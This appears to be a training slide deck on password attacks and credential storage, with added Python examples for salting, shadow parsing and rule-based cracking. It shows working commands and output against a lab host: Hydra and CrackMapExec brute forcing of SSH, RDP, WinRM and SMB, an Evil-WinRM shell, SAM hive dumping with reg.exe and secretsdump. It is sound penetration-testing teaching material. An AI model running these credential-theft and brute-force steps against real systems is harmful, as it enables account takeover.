Password Attacks

The document discusses various types of password attacks, including brute force and dictionary attacks, and the tools used to execute them, such as John the Ripper and Hashcat. It also covers methods for password storage and security, including salting and the use of hashed passwords in Linux and Windows systems. Additionally, it highlights the importance of credential management and the vulnerabilities associated with different authentication mechanisms.

@mmar Hassan
Authentication

Passwords

 Brute force attack: tries every combination of characters until a match is found
 Dictionary attack: compares a captured password (hash) against the words in a wordlist file

Tools like John the Ripper and Hashcat can be configured to execute both types of attacks
Authentication

Passwords: Online Attack, Offline Attack, Defense

 Online attack: try to log in as the user against the live service with different passwords (brute force or dictionary)
 Offline attack: steal a copy of the password file and try guesses on your own machine (or on many compromised machines, including their GPUs)
 Note: that is why we read-protect the hashed passwords
 Defense: rate-limit online guesses
 Defense: perhaps lock out the account after repeated failures, but that leaves you vulnerable to DoS attacks, since an attacker can lock out legitimate users on purpose
 Defense: make password guessing inherently slow by using a slow, salted password-hashing algorithm, so that an offline attacker pays for every guess
Authentication

Passwords: How to Store Passwords

 A dictionary attack feeds one value after another from a wordlist into the hash function and compares each result with the stored hash
 A brute-force attack tries every character combination in sequence until the hash matches
 Rainbow tables are another threat: the adversary precomputes hashes for a keyspace once and then looks stored hashes up instead of recomputing them. A complete lookup table of every hash would take terabytes, if not petabytes, of storage; rainbow tables use hash chains to trade computation for storage and fit in far less, which is why unsalted hashes are dangerous
Authentication

Salting: Defeating Rainbow Tables

 Salting is a process by which an added random value (the salt) is mixed into the hash function input, so that the resulting hash value changes even for the same password
 With a unique random salt per user, two users who choose the same password receive different stored hashes, and a precomputed table is useless: the adversary must recompute the hash for every salt, which makes cracking far more costly
 The salt is not secret; it is stored next to the hash. The cost comes from the per-user recomputation, and from using a deliberately slow hash function
 NIST SP 800-63B recommends that memorized secrets be salted (salt of at least 32 bits) and hashed with a suitable one-way key derivation function
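The effect described on the slides above, as an added example that is not part of the original deck: a per-user salt plus a slow KDF (PBKDF2-HMAC-SHA256, used here because it ships with the Python standard library), beside the weak unsalted scheme, attacked with a precomputed lookup table. The wordlist, user names, passwords and the 600,000-iteration default are constructed assumptions, not values from the slides.

```python
# Added example (not from the slides): per-user salting with a slow KDF, and why a
# precomputed lookup table only works against unsalted hashes.
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumption: OWASP's current floor for PBKDF2-HMAC-SHA256; tune to your hardware


def hash_password(password: str, salt: bytes = None, iterations: int = ITERATIONS) -> str:
    """Salt + slow hash. The salt is random per user and stored in the clear next to the hash."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def unsalted_sha256(password: str) -> str:
    """The weak scheme: one fast, unsalted hash, identical on every system."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def build_lookup_table(wordlist) -> dict:
    """Precompute hash -> password once. A rainbow table is the chained, space-saving form of this."""
    return {unsalted_sha256(w): w for w in wordlist}


def attack_with_table(stored: dict, table: dict) -> dict:
    """Look each stored value up in the table. Salted KDF strings never appear there."""
    return {user: table[h] for user, h in stored.items() if h in table}


# Constructed sample data (not from any real breach or from the slides).
WORDLIST = ["123456", "password", "dragon", "Password2022!", "letmein"]
USERS = {"alice": "Password2022!", "bob": "Password2022!", "carol": "correct horse battery staple"}


def demo() -> dict:
    table = build_lookup_table(WORDLIST)
    unsalted_db = {u: unsalted_sha256(p) for u, p in USERS.items()}
    salted_db = {u: hash_password(p) for u, p in USERS.items()}
    return {
        "same_unsalted_hash": unsalted_db["alice"] == unsalted_db["bob"],  # True: leaks the shared password
        "same_salted_hash": salted_db["alice"] == salted_db["bob"],        # False: salts differ
        "cracked_unsalted": attack_with_table(unsalted_db, table),         # alice and bob found instantly
        "cracked_salted": attack_with_table(salted_db, table),             # nothing found
        "alice_login_ok": verify_password("Password2022!", salted_db["alice"]),
        "alice_wrong_pw": verify_password("password2022!", salted_db["alice"]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Against the salted store the attacker's only option is to rebuild the table per salt, at 600,000 PBKDF2 iterations per guess, which is the "inherently slow" defense from the previous slide.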
Credential Storage
Credential Storage

 Every application that supports authentication compares the given credentials with a local or remote database. In the case of local databases, the credentials are stored locally on the system
 Web applications are often vulnerable to SQL injection, which in the worst case lets an attacker read the organization's entire data set, including any credentials stored in plain text or as unsalted hashes
Credential Storage

 There are many different wordlists that contain the most commonly used passwords. An example is rockyou.txt. This list includes about 14 million unique passwords and was created after the 2009 data breach of the company RockYou, which had stored the passwords of its 32 million user accounts in plain text
Credential Storage

LINUX

 Linux-based systems handle everything in the form of a file. Accordingly, password hashes are also stored in a file. This file is called the shadow file, is located at /etc/shadow, and is part of the Linux user management system. The passwords are stored as salted hashes, not encrypted: there is no key with which to recover them, so an attacker who obtains the file must crack them
Credential Storage

LINUX

 The /etc/shadow file has a fixed format in which entries are saved when new users are created: one line per user with nine colon-separated fields: username, password hash, date of last password change, minimum age, maximum age, warning period, inactivity period, expiration date, and a reserved field
Credential Storage

LINUX

 The password hash in this file is formatted as follows:

$<id>$<salt>$<hashed>

 Some hash methods insert an extra parameter field between the id and the salt, for example $6$rounds=<n>$<salt>$<hashed> or $y$<params>$<salt>$<hashed>
Credential Storage

LINUX

 The type (id) is the cryptographic hash method used to hash the password. Many different cryptographic hash methods were used in the past, and some are still used by some systems today

ID        Cryptographic Hash Algorithm
$1$       MD5 (md5crypt)
$2a$      bcrypt (Blowfish-based); $2b$ and $2y$ are newer bcrypt variants
$5$       SHA-256 (sha256crypt)
$6$       SHA-512 (sha512crypt)
$sha1$    SHA1crypt
$y$       yescrypt
$gy$      gost-yescrypt
$7$       scrypt

 md5crypt and sha1crypt are obsolete and fast to attack on a GPU; sha512crypt and, increasingly, yescrypt are the current defaults on most distributions
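A parser for the $id$[params$]salt$hash format and the nine shadow fields described on the slides above, as an added example that is not part of the original deck. It classifies each password field (hashed, empty, locked, legacy DES) and flags what a pentester or hardening review would report. The sample shadow lines are constructed; their salts and hash strings are placeholders, except for bob's line, which reuses the md5crypt hash shown in the opasswd output later in this deck.

```python
# Added example (not from the slides): parse /etc/shadow entries into their
# $id$[params$]salt$hash parts and flag weak or risky password fields.
HASH_IDS = {
    "1": "MD5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "SHA-256crypt", "6": "SHA-512crypt", "sha1": "SHA1crypt",
    "y": "yescrypt", "gy": "gost-yescrypt", "7": "scrypt",
}
WEAK_IDS = {"1", "sha1", "des"}  # fast to attack on a GPU

SHADOW_FIELDS = ["user", "password", "last_change", "min_age", "max_age",
                 "warn", "inactive", "expire", "reserved"]


def parse_password_field(pw: str) -> dict:
    """Classify one shadow password field and split a crypt string into its parts."""
    rec = {"status": "hashed", "id": None, "algorithm": None, "params": [], "salt": None, "hash": None}
    if pw == "":
        rec["status"] = "empty"            # no password at all (login without one if PAM allows nullok)
        return rec
    if pw[0] in "!*":
        rec["status"] = "locked"           # '!' = locked via passwd -l / usermod -L, '*' = never had a password
        pw = pw.lstrip("!*")
        if pw == "":
            return rec                     # nothing left to crack
        # a locked account often still carries its old hash, which is still worth cracking for reuse
    if pw.startswith("$"):
        parts = pw.split("$")              # ['', id, param..., salt, hash]
        if len(parts) < 4:
            raise ValueError(f"malformed crypt string: {pw!r}")
        rec["id"] = parts[1]
        rec["algorithm"] = HASH_IDS.get(parts[1], f"unknown({parts[1]})")
        rec["params"], rec["salt"], rec["hash"] = parts[2:-2], parts[-2], parts[-1]
    else:
        rec["id"], rec["algorithm"] = "des", "DES crypt (legacy)"   # 2-char salt + 11-char hash, no '$'
        rec["salt"], rec["hash"] = pw[:2], pw[2:]
    return rec


def parse_shadow_line(line: str) -> dict:
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 fields, got {len(fields)}: {line!r}")
    rec = dict(zip(SHADOW_FIELDS, fields))
    rec["password"] = parse_password_field(fields[1])
    return rec


def audit_shadow(text: str) -> list:
    """Return (user, finding) pairs worth reporting."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = parse_shadow_line(line)
        user, pw = rec["user"], rec["password"]
        if pw["status"] == "empty":
            findings.append((user, "empty password field"))
        elif pw["hash"] is not None and pw["id"] in WEAK_IDS:
            findings.append((user, f"weak hash type: {pw['algorithm']}"))
        if pw["status"] == "locked" and pw["hash"] is not None:
            findings.append((user, "locked account still stores a crackable hash"))
    return findings


# Constructed sample (placeholder salts/hashes; bob's md5crypt value is the one from the opasswd slide).
SAMPLE_SHADOW = """\
root:$6$rounds=656000$C0nstructedSalt$C0nstructedHashValue:19000:0:99999:7:::
alice:$y$j9T$C0nstructedSalt$C0nstructedHashValue:19500:0:99999:7:::
bob:$1$HjFAfYTG$qNDkF0zJ3v8ylCOrKB0kt0:18000:0:99999:7:::
carol::19500:0:99999:7:::
daemon:*:18000:0:99999:7:::
dave:!$6$C0nstructedSalt$C0nstructedHashValue:18500:0:99999:7:::
legacy:abC0nstructed:17000:0:99999:7:::
"""

if __name__ == "__main__":
    for user, finding in audit_shadow(SAMPLE_SHADOW):
        print(f"{user}: {finding}")
```

Run it against a real shadow file with `audit_shadow(open("/etc/shadow").read())` as root; the id and params fields are also what you need to pick the right john format or hashcat mode (1800 for sha512crypt, 500 for md5crypt).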
Credential Storage

LINUX

 A few more files belong to the user management system of Linux: /etc/passwd and /etc/group. In the past, the password hash was stored together with the username in /etc/passwd, but this was increasingly recognized as a security problem because that file must be world-readable (every program that maps UIDs to names needs it). The /etc/shadow file can only be read by root (and, on many distributions, by members of the shadow group)
Credential Storage

LINUX
hassan@htb[/htb]$ cat /etc/passwd
htb-student:x:1000:1000:,,,:/home/htb-student:/bin/bash

 The x in the second field means the password hash is kept in /etc/shadow; an actual hash here would be readable by every user. The remaining fields are UID, GID, GECOS (comment), home directory, and login shell
Credential Storage

LINUX

 Opasswd
 The file where old passwords are stored is /etc/security/opasswd (written by pam_unix with the remember option, or by pam_pwhistory, when password history is enforced). Administrator/root permissions are required to read the file unless its permissions have been changed manually. Each line holds username:uid:count:old_hash1,old_hash2,...; old hashes are worth cracking because users often reuse or only slightly modify previous passwords
ammar@htb[/htb]$ sudo cat /etc/security/opasswd

cry0l1t3:1000:2:$1$HjFAfYTG$qNDkF0zJ3v8ylCOrKB0kt0,$1$kcUjWZJX$E9uMSmiQeRh4pAAgzuvkq1
Credential Storage

Windows

 The Windows client authentication process can often be more complicated than on Linux systems and consists of many different modules that perform the entire logon, retrieval, and verification process. In addition, there are many different and complex authentication procedures on Windows, such as Kerberos authentication
Credential Storage

Windows

 The Local Security Authority (LSA) is a protected subsystem that authenticates users and logs them into the local computer. In addition, the LSA maintains information about all aspects of local security on a computer
Credential Storage

Windows

 The security subsystem keeps track of the security policies and accounts that reside on a computer system. In the case of a Domain Controller, these policies and accounts apply to the domain where the Domain Controller is located, and they are stored in Active Directory. In addition, the LSA subsystem provides services for checking access to objects, checking user permissions, and generating audit messages
Credential Storage

Windows

 Local interactive logon is performed by the interaction between the logon process (Winlogon), the logon user interface process (LogonUI), the credential providers, LSASS, one or more authentication packages, and SAM or Active Directory. Authentication packages, in this case, are the Dynamic-Link Libraries (DLLs) that perform authentication checks. For example, for non-domain-joined interactive logons, the authentication package Msv1_0.dll is used
Credential Storage

Windows
Winlogon
 Winlogon is a trusted process responsible for managing security-related user interactions. These include:
 Launching LogonUI to enter passwords at login
 Changing passwords
 Locking and unlocking the workstation
 It relies on credential providers installed on the system to obtain a user's account name or password. Credential providers are COM objects that are located in DLLs
Credential Storage

Windows
Winlogon
 Winlogon is the only process that intercepts login requests from the keyboard, sent via an RPC message from Win32k.sys. Winlogon immediately launches the LogonUI application at logon to display the user interface for logon. After Winlogon obtains a user name and password from the credential providers, it calls LSASS to authenticate the user attempting to log in
Credential Storage

Windows
LSASS
 The Local Security Authority Subsystem Service (LSASS), running as %SystemRoot%\System32\lsass.exe, hosts the authentication packages and is involved in every authentication on the machine. This service is responsible for the local system security policy, user authentication, and sending security audit logs to the Event log. In other words, it is the vault for Windows-based operating systems, which is why its process memory is such a popular target for credential theft
Credential Storage

Windows
LSASS

Authentication Package    Description
Lsasrv.dll        The LSA Server service both enforces security policies and acts as the security package manager for the LSA. It contains the Negotiate function, which selects either the NTLM or Kerberos protocol after determining which one will succeed.
Msv1_0.dll        Authentication package for local machine logons that don't require custom authentication (NTLM).
Samsrv.dll        The Security Accounts Manager (SAM) stores local security accounts, enforces locally stored policies, and supports APIs.
Kerberos.dll      Security package loaded by the LSA for Kerberos-based authentication on a machine.
Netlogon.dll      Network-based logon service; maintains the secure channel to a domain controller for pass-through authentication.
Ntdsa.dll         The Active Directory Directory System Agent; on a domain controller it implements the directory database (ntds.dit) that holds the domain account hashes.
Credential Storage

Windows
SAM Database
 The Security Account Manager (SAM) is a database file in Windows operating systems that stores local users' password hashes. It can be used to authenticate local and remote users. SAM uses cryptographic measures to prevent unauthenticated users from accessing the system. User passwords are stored in a hash format in a registry structure as either an LM hash or an NT hash (commonly called the NTLM hash). LM hashes are no longer stored by default since Windows Vista/Server 2008, so the LM field usually holds the fixed empty-LM value aad3b435b51404eeaad3b435b51404ee. The file is located at %SystemRoot%\System32\config\SAM and is mounted at HKLM\SAM. SYSTEM level permissions are required to view it.
Credential Storage

Windows
SAM Database
 Windows systems can be assigned to either a workgroup or a domain during setup. If the system has been assigned to a workgroup, it handles the SAM database locally and stores all existing users locally in this database. However, if the system has been joined to a domain, the Domain Controller (DC) must validate the credentials against the Active Directory database (ntds.dit), which is stored by default at %SystemRoot%\NTDS\ntds.dit on each DC
Credential Storage

Windows
Credential Manager
 Credential Manager is a feature built into all Windows operating systems that allows users to save the credentials they use to access various network resources and websites. Saved credentials are stored per user profile in each user's Credential Locker. Credentials are encrypted (with DPAPI, keyed to the user's logon secret) and stored at the following location:

PS C:\Users\[Username]\AppData\Local\Microsoft\[Vault/Credentials]\
Credential Storage

Windows
NTDS
 It is very common to come across network environments where Windows systems are joined to a Windows domain. This is common because it makes it easier for admins to manage all the systems owned by their respective organizations (centralized management). In these cases, the Windows systems will send all logon requests to Domain Controllers that belong to the same Active Directory forest. Each Domain Controller hosts a file called NTDS.dit
Credential Storage

Windows
NTDS
 NTDS.dit is a database file that stores the data in Active Directory, including but not limited to:
 User accounts (username & password hash)
 Group accounts
 Computer accounts
 Group policy objects
John The Ripper

 John the Ripper (JTR or john) is an essential pentesting tool used to check the strength of passwords and crack encrypted (or hashed) passwords using either brute force or dictionary attacks. It is open-source software initially developed for UNIX-based systems and first released in 1996. It has become a staple of security professionals due to its various capabilities.
John The Ripper

Usage

 The basic syntax for the command is

john --format=raw-sha256 hashes_to_crack.txt                    Default modes (single, wordlist, then incremental)
john --format=raw-sha256 --incremental hashes_to_crack.txt      Brute forcing
john --wordlist=<wordlist_file> --rules <hash_file>             Dictionary (with rules)

 With no mode option, John runs "single crack" mode, then its default wordlist, then incremental (brute-force) mode. For a dictionary attack, we specify the wordlist file(s) to use, in plain text with one word per line, and optionally a rule set. Rules generate candidate passwords using transformations such as appending numbers or capitalizing letters. Format names are listed by john --list=formats; sha256 on its own is not a valid format name, raw-sha256 is
John The Ripper

Cracking Files with John

 It is also possible to crack password-protected or encrypted files with John. We use additional tools that process the given files and produce hashes that John can work with. John automatically detects the format and tries to crack it. The syntax looks like this:
cry0l1t3@htb:~$ <tool> <file_to_crack> > file.hash
cry0l1t3@htb:~$ pdf2john server_doc.pdf > server_doc.hash
cry0l1t3@htb:~$ john server_doc.hash
# OR
cry0l1t3@htb:~$ john --wordlist=<wordlist.txt> server_doc.hash
John The Ripper

Cracking Files with John

 John ships with a number of *2john helpers that turn files into crackable hashes:

pdf2john        Converts PDF documents for John
ssh2john        Converts SSH private keys for John
mscash2john     Converts MS Cash hashes for John
keychain2john   Converts OS X keychain files for John
rar2john        Converts RAR archives for John

hassan@kali$ locate *2john*
/usr/bin/bitlocker2john
/usr/bin/dmg2john
/usr/bin/gpg2john
/usr/bin/hccap2john
/usr/bin/keepass2john
/usr/bin/putty2john
/usr/bin/racf2john
/usr/bin/rar2john
/usr/bin/uaf2john
/usr/bin/vncpcap2john
/usr/bin/wlanhcx2john
/usr/bin/wpapcap2john
/usr/bin/zip2john
Network Services

 During our penetration tests, every computer network we encounter will have services installed to manage, edit, or create content. All these services are hosted with specific permissions and are assigned to specific users. Apart from web applications, these services include (but are not limited to):

FTP         SMB        NFS
IMAP/POP3   SSH        MySQL/MSSQL
RDP         WinRM      VNC
Telnet      SMTP       LDAP

All these services have an authentication mechanism using a username and password.
WinRM

 Windows Remote Management (WinRM) is the Microsoft implementation of the Web Services Management Protocol (WS-Management). It is a network protocol based on XML web services using the Simple Object Access Protocol (SOAP), used for remote management of Windows systems. WinRM uses TCP ports 5985 (HTTP) and 5986 (HTTPS)
CrackMapExec

 CrackMapExec (now continued as NetExec, nxc, with the same syntax) is one of the favorite tools of attackers and security professionals for password spraying and brute forcing against network services. The general format for using CrackMapExec is as follows:
ammar@htb[/htb]$ crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>

 With a user list and a password list, CrackMapExec tries every combination; each failed attempt counts toward any account lockout policy, so check the policy before spraying

Cracking winrm password

ammar@htb[/htb]$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

WINRM 10.129.42.197 5985 NONE [*] None (name:10.129.42.197) (domain:None)
WINRM 10.129.42.197 5985 NONE [*] http://10.129.42.197:5985/wsman
WINRM 10.129.42.197 5985 NONE [+] None\user:password (Pwn3d!)
Evil-WinRM

 Evil-WinRM can then be used to connect with the cracked credentials

ammar@htb[/htb]$ evil-winrm -i 10.129.42.197 -u user -p password

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\user\Documents>
SSH

 Secure Shell (SSH) is a secure way to connect to a remote host to execute system commands or transfer files. The SSH server runs on TCP port 22 by default, to which we can connect using an SSH client. Hydra can be used to brute force the password (-L/-P take files, -l/-p take single values)
ammar@htb[/htb]$ hydra -L user.list -P password.list ssh://10.129.42.197

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak -

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:03:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://10.129.42.197:22/
[22][ssh] host: 10.129.42.197 login: user password: password
1 of 1 target successfully completed, 1 valid password found
Remote Desktop Protocol (RDP)

 Microsoft's Remote Desktop Protocol (RDP) is a network protocol that allows remote access to Windows systems via TCP port 3389 by default. RDP provides both users and administrators/support staff with remote access to Windows hosts within an organization. The Remote Desktop Protocol defines two participants for a connection: a so-called terminal server, on which the actual work takes place, and a terminal client, via which the terminal server is remotely controlled
Remote Desktop Protocol (RDP)

 We can also use Hydra to perform RDP brute forcing. Note the "might be valid but account not active for remote desktop" lines: the credentials were accepted but the account lacks the Remote Desktop Users right, so those passwords are still worth keeping for other services

ammar@htb[/htb]$ hydra -L user.list -P password.list rdp://10.129.42.197

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak -

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:05:40
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking rdp://10.129.42.197:3389/
[3389][rdp] account on 10.129.42.197 might be valid but account not active for remote desktop: login: mrb3n password: rockstar, continuing attacking the account.
[3389][rdp] account on 10.129.42.197 might be valid but account not active for remote desktop: login: cry0l1t3 password: delta, continuing attacking the account.
[3389][rdp] host: 10.129.42.197 login: user password: password
1 of 1 target successfully completed, 1 valid password found
Remote Desktop Protocol (RDP)

 Linux offers different clients to communicate with the desired server using the RDP protocol. These include Remmina, rdesktop, xfreerdp, and many others. For our purposes, we will work with xfreerdp.
ammar@htb[/htb]$ xfreerdp /v:10.129.42.197 /u:user /p:password

...SNIP...
New Certificate details:
Common Name: WINSRV
Subject: CN = WINSRV
Issuer: CN = WINSRV
Thumbprint: cd:91:d0:3e:7f:b7:bb:40:0e:91:45:b0:ab:04:ef:1e:c8:d5:41:42:49:e0:0c:cd:c7:dd:7d:08:1f:7c:fe:eb

Do you trust the above certificate? (Y/T/N) Y

 The certificate is self-signed (subject and issuer are both the host), which is the default for RDP and is why the client asks us to trust it manually
SMB

 We can use CrackMapExec to brute force SMB logins by passing user and password lists (-u user.list -p password.list). With a single valid credential, the same tool also enumerates the shares that account can reach:

ammar@htb[/htb]$ crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares

SMB 10.129.42.197 445 WINSRV [*] Windows 10.0 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB 10.129.42.197 445 WINSRV [+] WINSRV\user:password
SMB 10.129.42.197 445 WINSRV [+] Enumerated shares
SMB 10.129.42.197 445 WINSRV Share       Permissions   Remark
SMB 10.129.42.197 445 WINSRV -----       -----------   ------
SMB 10.129.42.197 445 WINSRV ADMIN$                    Remote Admin
SMB 10.129.42.197 445 WINSRV C$                        Default share
SMB 10.129.42.197 445 WINSRV SHARENAME   READ,WRITE
SMB 10.129.42.197 445 WINSRV IPC$        READ          Remote IPC

 We can also make use of Hydra and the Metasploit framework to brute force SMB
Password Mutations

 Many people create their passwords according to simplicity instead of security. To eliminate this human weakness that often compromises security measures, password policies can be created on all systems that determine how a password should look. This means that the system checks whether the password contains capital letters, special characters, and numbers. In addition, most password policies require a minimum length of eight characters, including at least one of the above character classes.
Password Mutations

 Unfortunately, users still tend to create weak passwords despite the existence of password policies. Most people follow the same habits when creating more complex passwords. Passwords are often closely related to the service used, so many employees pick passwords that contain the company's name. A person's preferences and interests also play a significant role: pets, friends, sports, hobbies, and many other elements of life
Password Mutations

 Commonly, users use the following additions to make their password fit the most common password policies:

Description                               Password Syntax
First letter is uppercase.                Password
Adding numbers.                           Password123
Adding year.                              Password2022
Adding month.                             Password02
Last character is an exclamation mark.    Password2022!
Adding special characters.                P@ssw0rd2022!
Password Mutations

 Based on statistics provided by WPengine, most passwords are not longer than ten characters. So what we can do is pick specific terms that are at least five characters long and seem most familiar to the users, such as the names of their pets, hobbies, preferences, and other interests. If a user takes a single word (such as the current month), adds the current year, and finishes with a special character, the password already reaches the ten-character requirement
Password Mutations

 We can use a very powerful tool called Hashcat to combine lists of potential names and labels with specific mutation rules to create custom wordlists (hashcat -r <rulefile> --stdout <wordlist>). Each line of a rule file is a sequence of functions applied left to right:

Function   Description
:          Do nothing.
l          Lowercase all letters.
u          Uppercase all letters.
c          Capitalize the first letter and lowercase the others.
sXY        Replace all instances of X with Y.
$!         Add the exclamation character at the end ($X appends any character X).
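The rule functions in the table above, the mutation patterns from the earlier mutation table, and the "wordlist plus rules" dictionary attack from the John usage slide, in one added example that is not part of the original deck. It implements a small hashcat-style rule engine, expands a base wordlist with it, and runs the candidates against raw SHA-256 hashes (what hashcat -m 1400 or john --format=raw-sha256 would do). The rule list, base words and target plaintexts are constructed for the example; the hash targets are computed from those plaintexts so the block is self-contained.

```python
# Added example (not from the slides): a minimal hashcat-style rule engine that turns a
# base wordlist into mutated candidates, then runs them as a dictionary attack against
# raw SHA-256 hashes (hashcat -m 1400 / john --format=raw-sha256).
import hashlib


def _tokenize(rule: str) -> list:
    """Split a rule line into functions: sXY carries two arguments, $X and ^X one, the rest none."""
    tokens, i = [], 0
    while i < len(rule):
        ch = rule[i]
        if ch == " ":
            i += 1
            continue
        width = 3 if ch == "s" else 2 if ch in "$^" else 1
        if i + width > len(rule):
            raise ValueError(f"truncated rule function at {rule[i:]!r}")
        tokens.append(rule[i:i + width])
        i += width
    return tokens


def apply_rule(rule: str, word: str) -> str:
    """Apply one rule line (a sequence of functions) to a word, left to right."""
    for tok in _tokenize(rule):
        op = tok[0]
        if op == ":":
            continue                                      # do nothing
        if op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == "c":
            word = word[:1].upper() + word[1:].lower()    # capitalize first, lowercase rest
        elif op == "r":
            word = word[::-1]                             # reverse
        elif op == "d":
            word = word * 2                               # duplicate
        elif op == "s":
            word = word.replace(tok[1], tok[2])           # replace all X with Y
        elif op == "$":
            word = word + tok[1]                          # append character
        elif op == "^":
            word = tok[1] + word                          # prepend character
        else:
            raise ValueError(f"unsupported rule function {tok!r}")
    return word


def generate_candidates(words, rules):
    """Every (word, rule) product, deduplicated, like `hashcat -r rules --stdout wordlist`."""
    seen = set()
    for word in words:
        for rule in rules:
            cand = apply_rule(rule, word)
            if cand not in seen:
                seen.add(cand)
                yield cand


def crack_sha256(target_hashes, words, rules) -> dict:
    """Dictionary attack: hash each candidate once and look it up against all targets."""
    targets = {h.lower() for h in target_hashes}
    found = {}
    for cand in generate_candidates(words, rules):
        digest = hashlib.sha256(cand.encode("utf-8")).hexdigest()
        if digest in targets and digest not in found:
            found[digest] = cand
            if len(found) == len(targets):
                break
    return found


# Rules mirroring the mutation table above (year 2022, month 02, trailing '!', leet swaps).
RULES = [":", "c", "c $1 $2 $3", "c $2 $0 $2 $2", "c $0 $2", "c $2 $0 $2 $2 $!", "c sa@ so0 $2 $0 $2 $2 $!"]
# Constructed base words (the kind of terms CeWL pulls from a company site) and constructed targets.
WORDS = ["password", "inlanefreight", "dragon"]
TARGET_PLAINTEXTS = ["Password2022!", "P@ssw0rd2022!", "Inlanefreight123", "Dragon02"]
TARGET_HASHES = [hashlib.sha256(p.encode("utf-8")).hexdigest() for p in TARGET_PLAINTEXTS]

if __name__ == "__main__":
    for digest, plain in crack_sha256(TARGET_HASHES, WORDS, RULES).items():
        print(f"{digest}:{plain}")
```

Three base words and seven rules already yield the whole target set; with a CeWL list of a few hundred words and hashcat's best64 rule set the same approach produces tens of thousands of plausible candidates.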
Custom Wordlists

 We can now use another tool called CeWL to scrape potential words from the company's website and save them in a separate list. We can then combine this list with the desired rules and create a customized password list that has a higher probability of guessing a correct password. We specify some parameters, like the depth to spider (-d), the minimum length of a word (-m), storage of the found words in lowercase (--lowercase), and the file where we want to store the results (-w).
Custom Wordlists

[!bash!]$ cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
[!bash!]$ wc -l inlane.wordlist

326
Credential Stuffing

 Administrators have to keep track of all the technology, infrastructure, and applications along with the data being accessed. The same password is often used during configuration and then never changed on one interface or another. In addition, almost all applications that ship with an authentication mechanism come with default credentials after installation, and these are frequently left unchanged after configuration, especially on internal applications
Credential Stuffing

 There are various databases that keep a running list of known default credentials. One of them is the DefaultCreds-Cheat-Sheet
 Attacking services with known username:password pairs (defaults, or pairs obtained from breaches or earlier in the engagement) is called credential stuffing. It is a simplified variant of brute forcing because only the known pairs are tried, not every combination of a user list and a password list
 We can create a list that separates these composite credentials with a colon (username:password) and pass it to Hydra with -C
Credential Stuffing

ammar@htb[/htb]$ hydra -C user_pass.list ssh://10.129.42.197
Attacking SAM

 With access to a non-domain-joined Windows system, we may benefit from quickly dumping the files associated with the SAM database, transferring them to our attack host, and cracking the hashes offline. Doing this offline ensures we can continue our attacks without maintaining an active session with the target
Copying SAM Registry Hives

 There are three registry hives that we can copy if we have local admin access on the target; each has a specific purpose when we get to dumping and cracking the hashes:

Registry Hive    Description
hklm\sam         Contains the hashes associated with local account passwords. We need the hashes so we can crack them and get the user account passwords in cleartext.
hklm\system      Contains the system bootkey, which is used to encrypt the SAM database. We need the bootkey to decrypt the SAM database.
hklm\security    Contains LSA secrets and cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.
Copying SAM Registry Hives

 We can create backups of these hives using the reg.exe utility (from an elevated prompt):

C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save

The operation completed successfully.

C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save

The operation completed successfully.
Copying SAM Registry Hives

 Technically we only need hklm\sam and hklm\system, but hklm\security can also be helpful to save, as it can contain hashes associated with cached domain user credentials present on domain-joined hosts. Once the hives are saved offline, we can use various methods to transfer them to our attack host
Dumping Hashes with Impacket's secretsdump.py

 One incredibly useful tool we can use to dump the hashes offline is Impacket's secretsdump.py
ammar@htb[/htb]$ locate secretsdump

ammar@htb[/htb]$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

[*] Target system bootKey: 0x4d8c7cff8a543fbf245a363d2ffce518
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3dd5a5ef0ed25b8d6add8b2805cce06b:::
